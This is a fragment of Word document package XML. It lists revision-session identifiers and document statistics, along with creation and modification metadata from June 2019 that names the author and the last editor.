    <w:rsid w:val="48B8051C"/>
    <w:rsid w:val="49054BC0"/>
    <w:rsid w:val="4A3C2D34"/>
    <w:rsid w:val="4A900D82"/>
    <w:rsid w:val="528E47F1"/>
    <w:rsid w:val="53EB74B7"/>
    <w:rsid w:val="586B4DB9"/>
    <w:rsid w:val="59047734"/>
    <w:rsid w:val="5B8E4951"/>
    <w:rsid w:val="62304518"/>
    <w:rsid w:val="64B74D78"/>
    <w:rsid w:val="66A24CED"/>
    <w:rsid w:val="6CD1674E"/>
    <w:rsid w:val="6EF05CB2"/>
    <w:rsid w:val="72DA7A31"/>
    <w:rsid w:val="73073AE4"/>
    <w:rsid w:val="738D6646"/>
    <w:rsid w:val="75A6147B"/>
    <w:rsid w:val="7EE5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</Words>
  <Characters>144</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>168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2019-06-24T00:24:00Z</dcterms:created>
  <dc:creator>Danhong huang</dc:creator>
  <cp:lastModifiedBy>黄丹虹</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-30T01:46:03Z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